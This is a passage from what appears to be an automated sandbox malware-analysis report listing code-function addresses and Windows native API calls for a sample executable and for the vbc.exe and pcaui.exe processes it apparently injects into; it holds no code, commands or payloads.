                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058C3090 NtSetValueKey,6_2_058C3090
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058C3010 NtOpenDirectoryObject,6_2_058C3010
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058C3D10 NtOpenProcessToken,6_2_058C3D10
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058C3D70 NtOpenThread,6_2_058C3D70
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058C39B0 NtGetContextThread,6_2_058C39B0
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_047D4650 NtSuspendThread,LdrInitializeThunk,8_2_047D4650
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_047D4340 NtSetContextThread,LdrInitializeThunk,8_2_047D4340
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_047D2C70 NtFreeVirtualMemory,LdrInitializeThunk,8_2_047D2C70
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_047D2C60 NtCreateKey,LdrInitializeThunk,8_2_047D2C60
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_047D2CA0 NtQueryInformationToken,LdrInitializeThunk,8_2_047D2CA0
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_047D2D30 NtUnmapViewOfSection,LdrInitializeThunk,8_2_047D2D30
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_047D2D10 NtMapViewOfSection,LdrInitializeThunk,8_2_047D2D10
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_047D2DF0 NtQuerySystemInformation,LdrInitializeThunk,8_2_047D2DF0
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_047D2DD0 NtDelayExecution,LdrInitializeThunk,8_2_047D2DD0
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_047D2EE0 NtQueueApcThread,LdrInitializeThunk,8_2_047D2EE0
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_047D2E80 NtReadVirtualMemory,LdrInitializeThunk,8_2_047D2E80
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_047D2F30 NtCreateSection,LdrInitializeThunk,8_2_047D2F30
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_047D2FE0 NtCreateFile,LdrInitializeThunk,8_2_047D2FE0
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_047D2FB0 NtResumeThread,LdrInitializeThunk,8_2_047D2FB0
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_047D2AF0 NtWriteFile,LdrInitializeThunk,8_2_047D2AF0
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_047D2AD0 NtReadFile,LdrInitializeThunk,8_2_047D2AD0
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_047D2B60 NtClose,LdrInitializeThunk,8_2_047D2B60
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_047D2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,8_2_047D2BF0
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_047D2BE0 NtQueryValueKey,LdrInitializeThunk,8_2_047D2BE0
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_047D2BA0 NtEnumerateValueKey,LdrInitializeThunk,8_2_047D2BA0
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_047D35C0 NtCreateMutant,LdrInitializeThunk,8_2_047D35C0
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_047D39B0 NtGetContextThread,LdrInitializeThunk,8_2_047D39B0
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_047D2C00 NtQueryInformationProcess,8_2_047D2C00
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_047D2CF0 NtOpenProcess,8_2_047D2CF0
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_047D2CC0 NtQueryVirtualMemory,8_2_047D2CC0
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_047D2D00 NtSetInformationFile,8_2_047D2D00
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_047D2DB0 NtEnumerateKey,8_2_047D2DB0
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_047D2E30 NtWriteVirtualMemory,8_2_047D2E30
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_047D2EA0 NtAdjustPrivilegesToken,8_2_047D2EA0
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_047D2F60 NtCreateProcessEx,8_2_047D2F60
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_047D2FA0 NtQuerySection,8_2_047D2FA0
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_047D2F90 NtProtectVirtualMemory,8_2_047D2F90
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_047D2AB0 NtWaitForSingleObject,8_2_047D2AB0
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_047D2B80 NtQueryInformationFile,8_2_047D2B80
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_047D3010 NtOpenDirectoryObject,8_2_047D3010
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_047D3090 NtSetValueKey,8_2_047D3090
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_047D3D70 NtOpenThread,8_2_047D3D70
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_047D3D10 NtOpenProcessToken,8_2_047D3D10
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_02829630 NtReadFile,8_2_02829630
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_028297D0 NtClose,8_2_028297D0
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_02829720 NtDeleteFile,8_2_02829720
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_028294C0 NtCreateFile,8_2_028294C0
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_02829940 NtAllocateVirtualMemory,8_2_02829940
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exeCode function: 0_2_013942040_2_01394204
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exeCode function: 0_2_0139DFB40_2_0139DFB4
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exeCode function: 0_2_013970430_2_01397043
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exeCode function: 0_2_052C48800_2_052C4880
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exeCode function: 0_2_052C3C790_2_052C3C79
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exeCode function: 0_2_052C3C880_2_052C3C88
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exeCode function: 0_2_058BB59E0_2_058BB59E
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exeCode function: 0_2_058B9A980_2_058B9A98
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exeCode function: 0_2_058B64680_2_058B6468
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exeCode function: 0_2_058B80B80_2_058B80B8
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exeCode function: 0_2_058B60300_2_058B6030
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exeCode function: 0_2_058B2C900_2_058B2C90
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exeCode function: 0_2_058B2CA00_2_058B2CA0
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exeCode function: 0_2_058B68A00_2_058B68A0
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exeCode function: 0_2_058B5BF80_2_058B5BF8
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exeCode function: 0_2_076C58700_2_076C5870
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exeCode function: 0_2_0BE600400_2_0BE60040
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exeCode function: 0_2_0BE645A00_2_0BE645A0
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exeCode function: 0_2_0BE645900_2_0BE64590
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exeCode function: 0_2_0BFACBE80_2_0BFACBE8
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exeCode function: 0_2_0BFA13A00_2_0BFA13A0
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exeCode function: 0_2_0BFA91B80_2_0BFA91B8
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exeCode function: 0_2_0BFACBE80_2_0BFACBE8
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exeCode function: 0_2_0BFA42280_2_0BFA4228
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exeCode function: 0_2_0BFA9E380_2_0BFA9E38
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exeCode function: 0_2_0BFA91B80_2_0BFA91B8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_004187F36_2_004187F3
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_004100236_2_00410023
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_004011406_2_00401140
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_004169F36_2_004169F3
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_004102436_2_00410243
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0040E2236_2_0040E223
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0040E3676_2_0040E367
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0040E3736_2_0040E373
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_004025D06_2_004025D0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_00402E106_2_00402E10
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0042EED36_2_0042EED3
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_059505916_2_05950591
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058905356_2_05890535
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0593E4F66_2_0593E4F6
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_059344206_2_05934420
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_059424466_2_05942446
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0588C7C06_2_0588C7C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058B47506_2_058B4750
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058907706_2_05890770
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058AC6E06_2_058AC6E0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_059441A26_2_059441A2
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_059501AA6_2_059501AA
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_059481CC6_2_059481CC
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058801006_2_05880100
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0592A1186_2_0592A118
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_059181586_2_05918158
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_059220006_2_05922000
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_059503E66_2_059503E6
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0589E3F06_2_0589E3F0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0594A3526_2_0594A352
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_059102C06_2_059102C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_059302746_2_05930274
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058A8DBF6_2_058A8DBF
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0588ADE06_2_0588ADE0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0589AD006_2_0589AD00
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0592CD1F6_2_0592CD1F
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05930CB56_2_05930CB5
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05880CF26_2_05880CF2
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05890C006_2_05890C00
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0590EFA06_2_0590EFA0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05882FC86_2_05882FC8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0589CFE06_2_0589CFE0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05932F306_2_05932F30
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058D2F286_2_058D2F28
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058B0F306_2_058B0F30
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05904F406_2_05904F40
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0594CE936_2_0594CE93
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058A2E906_2_058A2E90
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0594EEDB6_2_0594EEDB
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0594EE266_2_0594EE26
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05890E596_2_05890E59
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058929A06_2_058929A0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0595A9A66_2_0595A9A6
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058A69626_2_058A6962
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058768B86_2_058768B8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058BE8F06_2_058BE8F0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0589A8406_2_0589A840
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058928406_2_05892840
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05946BD76_2_05946BD7
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0594AB406_2_0594AB40
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0588EA806_2_0588EA80
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0592D5B06_2_0592D5B0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_059475716_2_05947571
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0594F43F6_2_0594F43F
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058814606_2_05881460
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0594F7B06_2_0594F7B0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_059416CC6_2_059416CC
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0589B1B06_2_0589B1B0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058C516C6_2_058C516C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0587F1726_2_0587F172
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0595B16B6_2_0595B16B
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058970C06_2_058970C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0593F0CC6_2_0593F0CC
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0594F0E06_2_0594F0E0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_059470E96_2_059470E9
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058D739A6_2_058D739A
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0594132D6_2_0594132D
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0587D34C6_2_0587D34C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058952A06_2_058952A0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058AB2C06_2_058AB2C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_059312ED6_2_059312ED
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058AFDC06_2_058AFDC0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05893D406_2_05893D40
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05941D5A6_2_05941D5A
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05947D736_2_05947D73
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0594FCF26_2_0594FCF2
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05909C326_2_05909C32
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05891F926_2_05891F92
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0594FFB16_2_0594FFB1
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05853FD56_2_05853FD5
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05853FD26_2_05853FD2
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0594FF096_2_0594FF09
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05899EB06_2_05899EB0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_059259106_2_05925910
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058999506_2_05899950
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058AB9506_2_058AB950
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058938E06_2_058938E0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058FD8006_2_058FD800
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058AFB806_2_058AFB80
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05905BF06_2_05905BF0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058CDBF96_2_058CDBF9
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0594FB766_2_0594FB76
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058D5AA06_2_058D5AA0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05931AA36_2_05931AA3
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0592DAAC6_2_0592DAAC
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0593DAC66_2_0593DAC6
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05947A466_2_05947A46
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0594FA496_2_0594FA49
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05903A6C6_2_05903A6C
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_0484E4F68_2_0484E4F6
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_048444208_2_04844420
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_048524468_2_04852446
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_048605918_2_04860591
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_047A05358_2_047A0535
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_047BC6E08_2_047BC6E0
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_047A07708_2_047A0770
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_047C47508_2_047C4750
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_0479C7C08_2_0479C7C0
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_048320008_2_04832000
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_048541A28_2_048541A2
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_048601AA8_2_048601AA
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_048581CC8_2_048581CC
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_047901008_2_04790100
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_0483A1188_2_0483A118
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_048281588_2_04828158
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_048202C08_2_048202C0
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_048402748_2_04840274
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_048603E68_2_048603E6
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_047AE3F08_2_047AE3F0
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_0485A3528_2_0485A352
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_04840CB58_2_04840CB5
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_047A0C008_2_047A0C00
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_04790CF28_2_04790CF2
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_047AAD008_2_047AAD00
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_0479ADE08_2_0479ADE0
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_0483CD1F8_2_0483CD1F
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_047B8DBF8_2_047B8DBF
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_0485CE938_2_0485CE93
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_047A0E598_2_047A0E59
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_0485EEDB8_2_0485EEDB
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_0485EE268_2_0485EE26
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_047B2E908_2_047B2E90
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_0481EFA08_2_0481EFA0
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_047C0F308_2_047C0F30
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_047E2F288_2_047E2F28
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_047ACFE08_2_047ACFE0
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_04792FC88_2_04792FC8
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_04842F308_2_04842F30
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_04814F408_2_04814F40
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_047A28408_2_047A2840
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_047AA8408_2_047AA840
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_047CE8F08_2_047CE8F0
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_047868B88_2_047868B8
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_047B69628_2_047B6962
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_0486A9A68_2_0486A9A6
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_047A29A08_2_047A29A0
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_0479EA808_2_0479EA80
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_04856BD78_2_04856BD7
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_0485AB408_2_0485AB40
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_047914608_2_04791460
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_0485F43F8_2_0485F43F
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_0483D5B08_2_0483D5B0
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_048695C38_2_048695C3
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_048575718_2_04857571
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_048516CC8_2_048516CC
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_047E56308_2_047E5630
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_0485F7B08_2_0485F7B0
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_0484F0CC8_2_0484F0CC
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_0485F0E08_2_0485F0E0
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_048570E98_2_048570E9
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_047A70C08_2_047A70C0
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_0478F1728_2_0478F172
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_047D516C8_2_047D516C
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_047AB1B08_2_047AB1B0
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_0486B16B8_2_0486B16B
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_048412ED8_2_048412ED
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_047BB2C08_2_047BB2C0
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_047A52A08_2_047A52A0
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_0478D34C8_2_0478D34C
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_0485132D8_2_0485132D
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_047E739A8_2_047E739A
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_0485FCF28_2_0485FCF2
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_04819C328_2_04819C32
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_047A3D408_2_047A3D40
